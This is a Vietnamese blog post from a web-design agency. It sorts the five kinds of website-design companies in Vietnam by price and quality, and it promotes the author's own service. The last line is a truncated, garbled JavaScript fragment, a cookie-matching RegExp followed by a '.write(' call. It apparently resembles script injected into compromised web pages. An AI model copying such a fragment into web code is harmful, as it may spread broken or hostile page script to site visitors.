Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > Kinh doanh > Cách chọn công ty thiết kế website

Cách chọn công ty thiết kế website

Tôi từng học lập trình , nhưng vì đam mê kinh doanh lên cũng chuyển sang làm tư vấn. Và hiện tại cũng như tương lai sẽ cố gắng gắn bó ngành dịch vụ website và marketing

Vừa rồi có một người bạn ngồi cafe hỏi :
Bản thân là người tư vấn thiết kế website ! Vậy nếu phải tìm một công ty làm website thì bạn sẽ tìm công ty như thế nào ?
Tôi thiết nghĩ đó là câu hỏi không chỉ để cho vui mà rất nhiều người đang tự hỏi . Nhất là trong cái thị trường lộn xộn như ở Việt Nam. Vậy tôi sẽ trả lời như thế này :

Chả có ai vừa rẻ lại vừa tốt cả. Vì ng ta bỏ công phải kiếm lãi chứ ko có lãi ai làm. Nên muốn làm website càng tốt thì đừng ham rẻ. Một website dạng tin tức ở nước ngoài đủ yêu cầu đã có giá 3000-5000 $ rồi . Sao ở VN chất xám rẻ thế bao công ăn học mà bị bán rẻ kiến thức. Vì như sau:

Trên thực tế có 5 kiểu công ty trên thị trường phổ biến

 

1.Công ty thiết kế website mới hoặc team :

Những kiểu công ty, team như thế này chính là thành phần báo giá siêu rẻ , website toàn 500k, 1- 2 triệu đồng. Đây cũng chính là nguyên nhân khách hàng  mất tiền, bực tôi, mất công đi làm lại suốt .Đồng thời làm phá giá thị trường, các công ty website tử tế chết dở vì kiểu làm ăn này này. Khách hàng ngơ ngác thì tưởng thế là hay, là chuẩn.  Nhưng tôi cũng chả buồn tiếp KH kiểu này vì :.Nên nhớ tiền nào của lấy. Kết qủa nhận được mấy cái website đã được copy có sẵn hết rồi, về chỉnh màu là cùng, sửa tên danh mục. Làm 1-2 giờ lao động xong bán cho khách hàng. Vậy là tiền công quá cao chư không phải rẻ như mọi người nghĩ.
Kết luận :  Đối tượng lên dùng là dùng trong thời gian ngắn, mua vụ, không cần thẩm mỹ. Không tái sử dụng website có thể mua để giải quyết vấn đề trước mắt. ví dụ : Bạn bán bánh trung thu, có ý định bán một mùa này thôi, mùa sau chưa chắc đã bán. Vẫn cần website để chạy quảng cáo. Vậy đây là kiểu website bạn có thể dùng mà không ảnh hưởng gì cả.

2. Công ty web bán hàng bằng thương hiệu : 

Nhờ vào thương hiệu lớn, nhiều dự án lớn, giá thường trên trời . Thực ra dịch vụ họ sẽ tốt và an toàn lâu dài nhưng giá là bán theo thương hiệu chứ không phải bán theo sản phẩm. Thêm vào đó thường sản phẩm sẽ hơi cũ kỹ ( khi bạn có thương hiệu thường sẽ bị tâm lý cho sản phẩm của mình  là nhất – bảo thủ ) không phải tất cả nhưng rất nhiều.

Kết luận:  Thường các công ty sẽ tìm tới , vì nghĩ thương hiệu thì an toàn. Ok vấn đề an toàn nhưng sản phẩm cuối cùng thường không đạt được như mong muốn, tốn nhiều chi phí . Không phải tất cả nhưng rất hay blame nhau, tùy vào khách hàng có đủ trình độ yêu cầu rõ ràng và chính xác điều mình cần hay không.

3. Công ty thiết kế web theo hệ thống : 

Nhiều công ty tạo dựng thành cả hệ thống. Có thể sản xuất cả nghìn website 1 tháng, thiết kế website giá rẻ . Chuẩn hóa như nhau, ít lỗi. Đáp ứng tiêu chí cơ bản của bán hàng.

Điểm yếu : không thể bàn giao code gốc vì code gốc là cả hệ thống của họ, nâng cấp, sửa chữa sẽ phụ thuộc hoàn toàn vào đối tác. Mà mỗi lần vậy mất chi phí. Tư vấn không được nhiều, vì hệ thống nó thế rồi . Làm kiểu hàng loạt thì chất lượng nhân viên tư vấn cũng không cao ( lương thấp, cứ có khách hàng là ăn) . Bán theo kiểu rẻ bèo ( cho thuê thì đúng hơn) rồi thu các giá trị khác khi KH cần thêm tính năng phát sinh. Đó mới là điểm ăn tiền
Kết luận : kiểu làm website theo mẫu hàng loạt này phù hợp với KH muốn làm website cho có, không có nhiều kiến thức , áp dụng bán hàng kết hợp mạng xã hội. Không cần phát triển thương hiệu hay lâu dài, có hay không có website không quá ảnh hưởng tới bán hàng. Thực ra chả sao vì chi phí nó thấp. nhưng để phát triển là rất khó. Lúc có điều kiện thì nên đi tìm 1 công ty khác chuyên thiết kế website theo yêu cầu.

4. Công ty chuyên đánh dự án :

Các bên như thế này khỏi nói tới,vì  chỉ chuyên làm dự án lớn,dự án chính phủ . Công ty thường cực chuyên nghiệp, quan hệ rộng. Dự án trị giá vài trăm triệu tới hàng triệu đô mới làm.

5. Công ty xây dựng uy tín từ từng sản phẩm

Đây chính là mô hình tôi thấy phù hợp nhất và bản thân dịch vụ thiết kế website Pridio đang theo đuổi. Giá vừa phải, chất lượng và dịch vụ tốt. Yếu điểm là ko có thương hiệu và không đủ tiềm lực đánh các dự án lớn, quá khó.
Nhưng vẫn phụ thuộc vào nhân viên tư vấn. Nếu tư vấn kém thì nó cũng chỉ hơn được các công ty hệ thống có sẵn 1 chút thôi. Bản thân các công ty này 90% % lãnh đạo là người trẻ, nhiệt huyết yêu nghề. Chán cảnh lừa đảo trong ngành website lên muốn tạo ra giá trị thật với giá phù hợp. Tuy nhiên với kiểu cạnh tranh của các bên phá giá và sức mạnh các công ty thương hiệu. Các công ty này thường sống bằng khách hàng cũ lâu dài là nhiều, và có thêm khách hàng từ nguồn đó.

Kết luận:
 Kiểu này dành cho các khách hàng hiểu vấn đề, biết lắng nghe,  muốn phát triển thực sự. Dám bỏ chi phí vừa phải. Sản phẩm cũng như dịch vụ sẽ tốt. Nhưng hên xui có gặp được tư vấn tốt hay không.

Tùy vào mục đích của tôi mà các bác chọn công ty, chứ không nhất thiết phải chọn tốt nhất.
Trên đây là kinh nghiệm và suy nghĩ của tôi về dịch vụ thiết kế website.
Còn để hiểu rõ hơn , bạn có thể gọi điện tới Prido và sẽ được lắng nghe những lời tư vấn thiết kế website chân thực nhất.

  (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘